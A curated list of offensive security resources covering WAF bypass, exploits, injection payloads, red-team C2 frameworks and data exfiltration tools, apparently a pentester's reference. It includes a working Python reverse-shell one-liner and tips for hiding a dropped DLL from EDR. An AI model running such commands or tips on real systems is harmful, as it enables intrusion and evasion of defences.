Web Application Penetration Testing Course URLs
Web Application Penetration Testing Notes
quarantyne 119 over 2 years ago : Modern Web Firewall: stop account takeovers, weak passwords, cloud IPs, DoS attacks, disposable emails
Sitadel 554 12 months ago : Web Application Security Scanner
WAF through the eyes of hackers
Some nice payloads to bypass XSS WAF :
Some MySQL tricks to break some #WAFs out there.
another one :
bypassing moderning web application firewalls
WAFW00F 5,296 about 2 months ago allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website
Bypassing Cloudflare WAF with the origin server IP address
WAF-Hook 5 8 months ago

CSIRT / Pentesting / WAFs / How to find real IP of a site behind cloudflare

Cloudfail tool
Shadowcrypt Cloudflare resolve
Behindflare tool 15 almost 2 years ago
Wordpress technique

CSIRT / Pentesting / WAFs

A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection

CSIRT / Pentesting / Exploits

IOSurface exploit 218 5 months ago
Attacking a co-hosted VM: A hacker, a hammer and two memory modules
How To Create a Metasploit Module
Installing Metasploit Pro, Ultimate, Express, and Community
unfurl 60 almost 7 years ago ,
A collection of vulnerable ARM binaries for practicing exploit development 898 about 3 years ago
A collection of PHP exploit scripts 838 9 months ago
Sage ACF Blocks 37 6 months ago : A Sage 10 helper package for building ACF blocks rendered using blade templates
WebKit exploit 749 over 3 years ago
Modern Binary Exploitation - Spring 2015
Python 2 vs 3 for Binary Exploitation Scripts (video)
DriveCrypt : DriveCrypt Dcr.sys vulnerability exploit
Faxploit : Sending Fax Back to the Dark Ages
beebug 210 over 5 years ago : A tool for checking exploitability
NAVEX : Precise and scalable exploit generation for dynamic web applications
Three New DDE Obfuscation Methods
SILENTTRINITY 2,196 12 months ago : A post-exploitation agent powered by Python, IronPython, C#/.NET
fuxploider 3,050 over 1 year ago : File upload vulnerability scanner and exploitation tool
Jailbreaks Demystified – GeoSn0w – Programmer. Hacking stuff
Attacking Google Authenticator
Pacu 4,391 8 days ago : The AWS exploitation framework, designed for testing the security of Amazon Web Services environments. ,

CSIRT / Pentesting / Exploits / Glibc Heap Exploitation Basics:

Introduction to ptmalloc2 internals (Part 1)
ptmalloc2 internals (Part 2) Fast Bins and First Fit Redirection

CSIRT / Pentesting / Exploits

movfuscator 9,461 6 months ago : The single instruction C compiler
beebug 210 over 5 years ago : A tool for checking exploitability
UEFI vulnerabilities classification focused on BIOS implant delivery and
MikroTik Firewall & NAT Bypass
3D Accelerated Exploitation 54 over 5 years ago : The content of this repository is meant to be the official release of the tooling/exploit that was discussed during the OffensiveCon 2019 talk - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium
GhostDelivery : Python script to generate obfuscated .vbs script that delivers payload (payload dropper) with persistence and windows antivirus disabling functions
Beat the hole in the ATM : hacking an diebold ATM
RedGhost 536 over 3 years ago : Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace
PowerSploit 11,918 over 4 years ago : is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment
Z-Shave. Exploiting Z-Wave downgrade attacks
Totally Pwning the Tapplock Smart Lock Andrew Tierney 13 Jun 2018
I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃 : python -c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
The Art of WebKit Exploitation
PEASS 16,117 21 days ago : Privilege Escalation Awesome Scripts SUITE
Patchless AMSI bypass using SharpBlock

CSIRT / Pentesting / Exploits / Patchless AMSI bypass using SharpBlock

Lets Create An EDR… And Bypass It! Part 1
Lets Create An EDR… And Bypass It! Part 2
SharpBlock 1,114 over 3 years ago : A method of bypassing EDR's active projection DLL's by preventing entry point exection. : Simple EDR implementation to demonstrate bypass

CSIRT / Pentesting / Exploits

Bypassing Antivirus with Golang – Gopher it!
The Invoke-CradleCrafter Overview
DVS 197 about 4 years ago : D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects
The Exploit Database Git Repository 7,738 about 2 years ago
Vulnerability Lab : helps with the world's first independent bug bounty hacker community. Leverage their skills and creativity to surface your critical vulnerabilities before criminals can exploit them
0day.Today : Biggest Exploits Database and 0day market - The Underground, is one of the world's most popular and comprehensive computer security web sites
cxsecurity : is an open project developed and moderated fully by one independent person
Security Focus
Exploit Files packet storm:
Graphology of an Exploit : Hunting for exploits by looking for the author’s fingerprints
Traditional Buffer Overflow Windows cheatsheet
Exploit writing tutorial part 3 : SEH Based Exploits
Vulnerability DB : Detailed information and remediation guidance for known vulnerabilities
mssqlproxy 724 almost 4 years ago is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse
Script to decode .vbe files
A First Introduction to System Exploitation
AllPocsFromHackerOne 874 almost 2 years ago : This script grabs public report from hacker one and download all JSON files to be grepable
How I Found My First Ever ZeroDay (In RDP)
Part 1 Learning Linux Kernel Exploitation: ,
SharpSelfDelete 147 about 3 years ago : C# implementation of the research by @jonaslyk and the drafted PoC from @LloydLabs
preeny 1,574 7 months ago : Some helpful preload libraries for pwning stuff
Exploits, Vulnerabilities and Payloads: Practical Introduction
Beginners Guide to 0day/CVE AppSec Research
0days In-The-Wild Hello! This site aims to be a central repository for information about 0-days exploited in-the-wild! It's maintained by Google Project Zero
Sticky notes for pentesting.

CSIRT / Pentesting / Payloads

Payloads Collection by @alra3ees:

CSIRT / Pentesting / Payloads / Payloads Collection

Command Injection Payload List 3,006 4 months ago
Cross Site Scripting (XSS) Vulnerability Payload List 6,366 4 months ago
XML External Entity (XXE) Injection Payload List 1,097 4 months ago : XML External Entity (XXE) Injection Payload List
SQL Injection Payload List 5,000 4 months ago : SQL Injection Payload List
RFI/LFI Payload List 538 4 months ago
Open Redirect Payload List 533 4 months ago

CSIRT / Pentesting / Payloads / MSFVenom:

Criando Payloads de Shell Reverso com MSFVenom (pt-br)
MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)
MSFVenom - CheatSheet
Hiding Metasploit Shellcode to Evade Windows Defender
Creating Metasploit Payloads
Shikata Ga Nai Encoder Still Going Strong
BYPASSING ANTIVIRUS WITH MSFVENOM
MSFVenom Cheatsheet

CSIRT / Pentesting / Payloads

Payload Delivery for DevOps : Building a Cross-Platform Dropper Using the Genesis Framework, Metasploit and Docker
LaTex Injection 61,337 9 days ago
Hiding malicious code with “Module Stomping”: Part 1
Phantom-Evasion 1,392 about 1 year ago : Python antivirus evasion tool
Steganography 572 about 1 month ago : Least Significant Bit Steganography for bitmap images (.bmp and .png), WAV sound files, and byte sequences. Simple LSB Steganalysis (LSB extraction) for bitmap images
PyFuscation 510 almost 2 years ago : Obfuscate powershell scripts by replacing Function names, Variables and Parameters
Starting a handler with Metasploit
Reverse Shell Cheat Sheet
System Calls 107 about 3 years ago : An example of using Syscalls in C# to get a meterpreter shell
Awesome one-liner bug bounty
bbrecon 219 over 3 years ago Python library and CLI for the Bug Bounty Recon API
RPC Bug Hunting Case Studies – Part 1
Top Penetration Testing & Bug Hunting YouTube Channels you should follow Updated 11/19/2020
Our top tips for better bug bounty reports, plus a hacker contest!
axiom 4,058 about 2 months ago : The dynamic infrastructure framework for anybody!
KindleDrip : From Your Kindle’s Email Address to Using Your Credit Card
Amazon Kindle Vulnerabilities Could Have Led Threat Actors to Device Control and Information Theft
How I Might Have Hacked Any Microsoft Account
BugBountyScanner 874 11 months ago : A Bash script and Docker image for Bug Bounty reconnaissance. Intended for headless use
alert() is dead, long live print()
Bug Bounty Reconnaissance Framework 295 5 days ago The (BBRF) can help you coordinate your reconnaissance workflows across multiple devices
If you do use BBRF, here it is a initial script to use HackerOne API to gather all programs' scope, including your private programs.
KeyHacks 5,099 3 months ago is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
NotKeyHacks is the opposite of the KeyHacks repository by @streaak. Sensitive tokens are fun, but a lot of time is wasted reading documentation only to figure out that the token you found named AppSecret is, somehow, not sensitive at all and meant to be public. This repository is meant to be an inventory of those tokens that look potentially sensitive but aren't so that we can just CTRL-F and save a lot of time
Two Rights Might Make A Wrong
You always hear stories about how bug bounty programs steal your bug, but very few people post about it, or have the 100% proof to show this.
OOB reads in network message handlers leads to RCE
Bug Bounty Resources
Google Bug Hunters Welcome to Google's Bug Hunting community
0-Day Hunting (Chaining Bugs/Methodology)
KingOfBugBounty Project 4,234 4 months ago : Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters
awesome-web-hacking 5,875 1 day ago : A list of web application security
gau 4,000 25 days ago : Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl
malvun is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself
Introducing CookieMonster : a tool for breaking stateless authentication
get-title 2,148 about 1 year ago
Insecure Direct Object References 61,337 9 days ago
bugbounty-cheatsheet 5,938 about 1 year ago : A list of interesting payloads, tips and tricks for bug bounty hunters
Awesome Bug Bounty 4,668 10 months ago : A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups
ParamSpider 2,527 5 months ago : Mining parameters from dark corners of Web Archives
Server Side Request Forgery 61,337 9 days ago
CRLF 5,938 about 1 year ago
CRLF Injection 61,337 9 days ago
crlf-injector 46 over 2 years ago : A CRLF ( Carriage Return Line Feed ) Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL
CRLF Bruter 10 over 3 years ago : A simple tool to test for CRLF injection
CSV-Injection 5,938 about 1 year ago
CSV Injection 61,337 9 days ago
Command Injection 61,337 9 days ago
Directory Traversal 61,337 9 days ago
$4,000 Starbucks secondary context path traversal
LFI 5,938 about 1 year ago
kadimus 514 over 4 years ago : kadimus is a tool to check and exploit lfi vulnerability
fimap : is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps
File Inclusion 61,337 9 days ago
Open-Redirect 5,938 about 1 year ago
RCE 5,938 about 1 year ago
Crypto 5,938 about 1 year ago
Template Injection 5,938 about 1 year ago
SSTI 61,337 9 days ago
XSLT 5,938 about 1 year ago
Content Injection 5,938 about 1 year ago
LDAP Injection 61,337 9 days ago
NoSQL Injection 61,337 9 days ago
IDOR 61,337 9 days ago
ISCM 61,337 9 days ago
OAuth 61,337 9 days ago
XPATH Injection 61,337 9 days ago
Bypass Upload Tricky 61,337 9 days ago
Web Security CheatSheet
Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment.
Zeus-Scanner 959 about 1 year ago : is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas

CSIRT / Pentesting / Payloads / SQL Injection:

SQL injection
SQL Injection
Blind SQL injection
Dangerous Injections
Blind SQL Injection at fasteditor.hema.com
SQL Injection 101: How to Fingerprint Databases & Perform General Reconnaissance for a More Successful Attack
SQL injection cheat sheet
SQL Injection Cheat Sheet
The Ultimate SQL Injection Cheat Sheet
Examining the database in SQL injection attacks
Dumping a complete database using SQL injection
SQLi 5,938 about 1 year ago
SleuthQL : A SQL Injection Discovery Tool
Postgres SQL Injection Cheat Sheet
From SQL Injection to Shell: PostgreSQL edition
Pentesting PostgreSQL with SQL Injections
SQLite Injection 61,337 9 days ago
Blind SQL Injection Detection and Exploitation (Cheat Sheet)
1 SQLMap Cheat Sheet: , , , ,
SQL injection : Improper handling of input during SQL query generation
An investigation into SQL Injection tools — The pattern of each attack tool Part II
Advanced SQL Injection

CSIRT / Pentesting / Payloads / CSRF:

DNS Hijacking Attacks on Home Routers in Brazil
CSRF Injection 61,337 9 days ago
Bypassing CSRF tokens with Python’s CGIHTTPServer to exploit SQL injections

CSIRT / Pentesting / Payloads / HTTP Request Smuggling:

HRS - 𝐇𝐓𝐓𝐏 𝐑𝐞𝐪𝐮𝐞𝐬𝐭 𝐒𝐦𝐮𝐠𝐠𝐥𝐢𝐧𝐠 Attack. What, Why and How.
Practical Attacks Using HTTP Request Smuggling
HAProxy HTTP request smuggling (CVE-2019-18277)
The Powerful HTTP Request Smuggling
Smuggler 13 about 2 years ago : An HTTP Request Smuggling / Desync testing tool written in Python 3
HTTP.Request.Smuggling.Desync.Attack 14 over 3 years ago : HTTP request smuggling is a technique for interfering with the way of website process the sequences of HTTP requests that are received from one or more users
h2c Smuggling : Request Smuggling Via HTTP/2 Cleartext (h2c)
HTTP Request Smuggler 958 11 months ago : This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research
Advanced request smuggling

CSIRT / Pentesting / Payloads / XSS:

Cross-site scripting (XSS) cheat sheet
Reflected XSS on www.hackerone.com via Wistia embed code
xss cheatsheet 5,938 about 1 year ago
Cross Site Scripting ( XSS ) Vulnerability Payload List 6,366 4 months ago
an XSS payload, Cuneiform-alphabet based

CSIRT / Pentesting / Payloads

Security impact of a misconfigured CORS implementation
Which Security Risks Do CORS Imply?
Cross-Origin Resource Sharing (CORS)
How to win at CORS
CORS'ing a Denial of Service via cache poisoning
SSRF Search & Destroy :
SSRF 5,938 about 1 year ago
SSRF Tips : some tips with Server Side Request Forgery
Server Side Request Forgery on MISP : CVE-2020-28043
SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever !
Unauthenticated Full-Read SSRF in Grafana : CVE-2020-13379
Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
Gf-Patterns 1,216 2 months ago : GF Paterns For (ssrf,RCE,Lfi,sqli,ssti,idor,url redirection,debug_logic, interesting Subs) parameters grep
Blind SSRF Chains by
lorsrf 289 2 months ago : Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods
Out of Band XXE in an E-commerce IOS app by
Comprehensive Guide on XXE Injection
XMLDecoder payload generator 149 almost 4 years ago : A simple python script to generate XML payloads works for XMLDecoder based on ProcessBuilder and Runtime exec
Enjoying my first blind xxe experience
XXE 5,938 about 1 year ago
dtd-finder 610 9 months ago : List DTDs and generate XXE payloads using those local DTDs
New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
XXE_payloads
Advanced XXE Exploitation
Planilhas Baby , ssrf + ssti + xxe
ysoserial 7,789 8 months ago : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization
SerialVersionUID in Java
Java Serialization Magic Methods And Their Uses With Example
Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020–9484) , : java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
CVE-2020-9484-Mass-Scan 32 over 4 years ago
Exploiting JNDI Injections in Java
How to exploit Liferay CVE-2020-7961 : quick journey to PoC
How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
Serialization: the big threat
marshalsec 3,403 almost 2 years ago : Turning your data into code execution
SerializationDumper 989 5 months ago : A tool to dump Java serialization streams in a more human readable form
owaspsd-deserialize-my-shorts 5 over 8 years ago : Slide deck from OWASP SD Talk "Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization"
Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities
Deserialization
FAR SIDES OF JAVA REMOTE PROTOCOLS
Serialization and deserialization in Java: explaining the Java deserialize vulnerability
Testing and exploiting Java Deserialization in 2021
Queries and Mutations
GraphQL Injection 61,337 9 days ago
GraphQL : Common vulnerabilities & how to exploit them. :  Represent any GraphQL API as an interactive graph
GraphQLmap 1,390 9 months ago : is a scripting engine to interact with a graphql endpoint for pentesting purposes

CSIRT / Pentesting / Payloads / RPC:

Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries
ProtoFuzz 272 over 1 year ago : Google Protocol Buffers message generator
pbtk - Reverse engineering Protobuf apps 1,414 about 1 month ago : A toolset for reverse engineering and fuzzing Protobuf-based apps
Online Protobuf Decoder.

CSIRT / Pentesting / Payloads

Burp Suite Cheat Sheet
Burp Suite Academy

CSIRT / Pentesting / Payloads / REST Assured: Penetration Testing REST APIs Using Burp Suite:

Part 1 – Introduction & Configuration
Part 2 – Testing
Part 3 – Reporting

CSIRT / Pentesting / Payloads

Awesome Burp Extensions 3,001 5 days ago : A curated list of amazingly awesome Burp Extensions
BurpSuiteHTTPSmuggler 709 over 5 years ago : A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques
AutoRepeater 846 almost 3 years ago : Automated HTTP Request Repeating With Burp Suite
privatecollaborator 205 5 months ago : A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificate
Deploying a private Burp Collaborator server
Burp Collaborator Server docker container with LetsEncrypt certificate 280 4 months ago : This repository includes a set of scripts to install a Burp Collaborator Server in a docker environment, using a LetsEncrypt wildcard certificate. The objective is to simplify as much as possible the process of setting up and maintaining the server
SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT : The Burp Suite Collaborator is a valuable tool for penetration testers and bug bounty hunters. It basically gives you unique subdomains and logs all interactions (DNS, HTTP(S), SMTP(S)) towards the subdomains. This can be used for example to detect SSRF-vulnerabilities and exfiltrate data
AES-Killer v3.0 : Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly
Femida-xss 277 about 5 years ago : Automated blind-xss search for Burp Suite
dotNetBeautifier 12 over 9 years ago : A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE)
Java-Deserialization-Scanner 775 about 3 years ago : All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities
JavaSerialKiller 208 10 months ago : Burp extension to perform Java Deserialization Attacks
BurpBounty 1,680 7 months ago : Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that improve an active and passiv
Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04
BurpExtension-WhatsApp-Decryption-CheckPoint 637 about 5 years ago
InQL 1,540 5 months ago : A Burp Extension for GraphQL Security Testing
param-miner 1,245 9 days ago
PII-Identifier 21 almost 4 years ago : Burp Extension to identify PII data
403Bypasser 1,567 over 1 year ago : Burpsuite Extension to bypass 403 restricted directory
API testing with Swurg for Burp Suite
403Bypasser 1,567 over 1 year ago
create a Passive Profile for a param value, like testsqli and then create a Rule with this Profile to trigger SQLi active profile. Burp Bounty
Handling Short Expiration Time of Authorization Tokens
BurpSuite-Team-Extension 252 about 2 years ago : This Burpsuite plugin allows for multiple web app testers to share their proxy history with each other in real time. Requests that comes through your Burpsuite instance will be replicated in the history of the other testers and vice-versa!
ActiveScan++ 208 12 months ago : ActiveScan++ Burp Suite Plugin

CSIRT / Pentesting / Red Team

Awesome Red Teaming 6,917 11 months ago
DumpsterFire 996 over 4 years ago : "Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts
Machine Learning for Red Teams, Part 1
Flying under the radar : Hack into a „highly protected“ company without getting caught
demiguise 1,371 about 2 years ago : HTA encryption tool for RedTeams
Sn1per 8,120 about 1 month ago : Automated pentest framework for offensive security experts
jenkins-shell 94 over 6 years ago : Automating Jenkins Hacking using Shodan API
Red Team's SIEM 2,383 2 months ago : easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations
The-Hacker-Playbook-3-Translation 2,289 over 4 years ago : 对 The Hacker Playbook 3 的翻译。
How Do I Prepare to Join a Red Team?
Red Team & Physical Entry Gear
Gaining access on an external engagement through spear-phishing Red Team Techniques:
Phantom Tap (PhanTap) 582 6 months ago : an ‘invisible’ network tap aimed at red teams
So You Want to Run a Red Team Operation : I built a red team for a Forbes 30 company, and now I am sharing some pointers to help you build one in your organization
Alternative C2 for Red Teamers : . Koadic C3 COM Command & Control - JScript RAT
tunning tip : if you plan to drop a dll and load directly via macro from within office (winword or excel), use the following path %localappdata%\assembly\tmp<rand>\a.b.c.dll (it's a busy tmp folder and I doubt EDRs will notify on every file creation in that folder)
In-Memory-Only ELF Execution (Without tmpfs) : In which we run a normal ELF binary on Linux without touching the filesystem (except /proc)
A Red Teamer's guide to pivoting
caldera 5,653 21 days ago : Automated Adversary Emulation
BankSecurity - Red_Team 1,551 almost 3 years ago : Some scripts useful for red team activities
FIN6 Adversary Emulation 1,723 11 months ago
Red-Teaming-Toolkit 9,098 3 months ago : A collection of open source and commercial tools that aid in red team operations
RedFile 18 over 2 years ago : A flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads
Choose Your Own Red Team Adventure
Red Tip #415 : STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use “smbpasswd -r domain.fqdn -U username” to change the password so you can use the account
Red Team Tactics: Hiding Windows Services
AQUARMOURY : This is a tool suite consisting of miscellaneous offensive tooling aimed at red teamers/penetration testers to primarily aid in Defense Evasion TA0005
Prelude Operator : is the first intelligent and autonomous platform built to attack, defend and train your critical assets through continuous red teaming
0xsp Mongoose Red for Windows 530 over 2 years ago : a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network
Macrome 513 almost 3 years ago : Excel Macro Document Reader/Writer for Red Teamers & Analysts
FireEye Red Team Tool Countermeasures 2,650 9 months ago and
wifipumpkin3 1,982 11 months ago : Powerful framework for rogue access point attack
The worst of the two worlds: Excel meets Outlook
redcanaryco/AtomicTestHarnesses: Public Repo for Atomic Test Harness 252 5 months ago
pivoting cheat sheet
Self-hosting Your Red Team Payloads : : Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV
Boomerang 216 almost 4 years ago is a tool to expose multiple internal servers to web/cloud. Agent & Server are pretty stable and can be used in Red Team for Multiple levels of Pivoting and exposing multiple internal services to external/other networks
Mythic 3,263 6 days ago : A collaborative, multi-platform, red teaming framework
Alan Framework 462 10 months ago : A post-exploitation framework
Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams
Red Teaming/Adversary Simulation Toolkit
Wiki to collect Red Team infrastructure hardening resources 4,149 8 months ago
Red Team development and operations : A PRACTICAL GUIDE TO RED TEAM OPERATIONS, WRITTEN BY: JOE VEST AND JAMES TUBBERVILLE
VECTR 1,393 2 months ago is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios
Mortar Loader 1,410 11 months ago : evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
RedTeam-Tools 6,004 over 1 year ago : Tools and Techniques for Red Team / Penetration Testing
Cobalt Strike : is software for Adversary Simulations and Red Team Operations. 4.2
CrossC2 2,283 about 1 year ago : generate CobaltStrike's cross-platform payload
Cobalt-Strike-CheatSheet 986 almost 3 years ago : Some notes and examples for cobalt strike's functionality
Introducing
Octopus 730 over 3 years ago : Open source pre-operation C2 server based on python and powershell
Covenant 4,197 4 months ago : Covenant is a collaborative .NET C2 framework for red teamers
Building C2 Implants in C++: A Primer
tc2 26 almost 4 years ago : treafik fronted c2 examples
ToRat 977 over 1 year ago : is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication
Python Backdoor Talking to a C2 Through Ngrok
Silver 8,536 10 days ago : Implant framework
PoshC2 1,820 about 1 month ago : is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement
pyMalleableC2 267 24 days ago : Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically
link 563 over 3 years ago : is a command and control framework written in rust
Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1
THIRD STEP IN SETTING UP C2 ENVIRONMENT. USING SOCAT AS FRONT TO MERLIN. COMMAND AND CONTROL MY WAY.
Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2
melting-cobalt 164 about 2 years ago : A Cobalt Strike Scanner that retrieves detected Team Server beacons into a JSON object
面向iOS攻击的beacon生成 : command & control on iOS

CSIRT / Pentesting / Purple Team

Purple Cloud 525 10 days ago : An Infrastructure as Code (IaC) deployment of a small Active Directory pentest lab in the cloud. The deployment simulates a semi-realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On
PRO TIP when looking through logs on Windows. Use WEVTUTIL.exe

CSIRT / DNS

dnstwist 4,912 about 2 months ago
Plight At The End Of The Tunnel
dref 481 over 3 years ago : DNS Rebinding Exploitation Framework
dns-rebind-toolkit 485 about 3 years ago : A front-end JavaScript toolkit for creating DNS rebinding attacks
Bypass firewalls by abusing DNS history 1,197 about 2 years ago : Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters
dnstwist 4,912 about 2 months ago : Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
Can I take over XYZ? 4,867 6 days ago : a list of services and how to claim (sub)domains with dangling DNS records
SubR3con 18 over 5 years ago : is a script written in python. It uses Sublist3r to enumerate all subdomains of specific target and then it checks for stauts code for possible subdomain takeover vulnerability. This works great with Subover.go
TakeOver-v1 101 over 1 year ago : script extracts CNAME record of all subdomains at once. TakeOver saves researcher time and increase the chance of finding subdomain takeover vulnerability
subzy 1,063 2 months ago : Subdomain takeover vulnerability checker
Subdomain Takeover Scanner 57 over 1 year ago
subdomain-takeover 353 over 1 year ago : SubDomain TakeOver Scanner by 0x94
DNSCrypt is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven’t been tampered with. , and
pdns-qof 36 3 months ago : Passive DNS Common Output Format
dnsdbq 94 14 days ago : DNSDB API Client, C Version

CSIRT / DNS / DNS Logging:

How to enable bind query logging to find out Who’s Querying a Name Server
BIND Logging - some basic recommendations
BIND 9 logging best practices
BIND9 Configuration Guide
Thwarting and detecting malware with RPZ and OSSEC
The Importance of DNS Logging in Enterprise Security

CSIRT / DNS

DNSObserver 188 about 4 years ago : A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends lookup notifications via Slack
Unbound DNS Blacklist
subjack 1,911 over 1 year ago : Subdomain Takeover tool written in Go
sad dns : The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq)
dog 6,179 6 months ago : Command-line DNS client
NtHiM 355 over 1 year ago : Now, the Host is Mine! - Super Fast Sub-domain Takeover Detection!
Passive DNS - Common Output Format 36 3 months ago
DNS loophole makes nation-state level spying as easy as registering a domain

CSIRT / Exfiltration

Script for searching the extracted firmware file system for goodies! 1,057 about 1 year ago
DKMC - Dont kill my cat 1,377 over 4 years ago : Malicious payload evasion tool
Tunna 1,241 about 2 years ago is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments
gitleaks 17,964 17 days ago : Searches full repo history for secrets and keys
Twitter Scraper 3,936 about 1 year ago
tinfoleak ( ):The most complete open-source tool for Twitter intelligence analysis
Social IDs 12 almost 8 years ago : Get user ids from social network handlers
SpookFlare 946 over 5 years ago : Meterpreter loader generator with multiple features for bypassing client-side and network-side countermeasures
Photon 11,067 3 months ago : Incredibly fast crawler which extracts urls, emails, files, website accounts and much more
Extracting data from an EMV (Chip-And-Pin) Card with NFC technology
accountanalysis : This tool enables you to evaluate Twitter accounts. For example how automated they are, how many Retweets they post, or which websites they link to most often
How to get authentication key from SNMPv3 packets
AtomicTestsCommandLines.txt : Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
whois | GTFOBins : hangs waiting for the remote peer to close the socket. , GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
ssh-keygen can be used to load shared libraries
Browsers affected by the History API DoS
PacketWhisper : Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography. : Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server
Using Google Analytics for data extraction
Exfiltrating credentials via PAM backdoors & DNS requests
Building simple DNS endpoints for exfiltration or C&C
CheckPlease 898 over 3 years ago : Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust
okhttp-peer-certificate-extractor 79 over 8 years ago : This tool extracts peer certificates from given certificates
DET 820 about 7 years ago : (extensible) Data Exfiltration Toolkit (DET)
awesome-python-login-model 15,938 over 2 years ago : login access for webscrapping
Hamburglar 316 almost 2 years ago : collect useful information from urls, directories, and files
Giggity 126 over 1 year ago : grab hierarchical data about a github organization, user, or repo
Living Off The Land Binaries and Scripts (and also Libraries) -
Windows TCPIP Finger Command : C2 Channel and Bypassing Security Software
Living Off Windows Land – A New Native File “downldr”
Ttdinject.exe : Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
Exfiltrate Like a Pro : Using DNS over HTTPS as a C2 Channel
Awesome Asset Discovery 1,990 6 months ago : List of Awesome Asset Discovery Resources
Cloakify-Factory: : A Data Exfiltration Tool Uses Text-Based Steganography. : Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection
hakrawler 4,502 10 months ago : Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application
Chameleon 459 about 2 years ago : A tool for evading Proxy categorisation
DNSExfiltrator 847 7 months ago : Data exfiltration over DNS request covert channel
Data Exfiltration using Linux Binaries
Exploring the WDAC Microsoft Recommended Block Rules: kill.exe . lolbin/lolbas
